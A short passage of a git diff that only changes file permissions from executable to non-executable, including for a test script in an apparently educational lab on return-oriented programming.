old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/tests/tests.sh b/labs/lab-12/tasks/rop/tests/tests.sh
old mode 100755
new mode 100644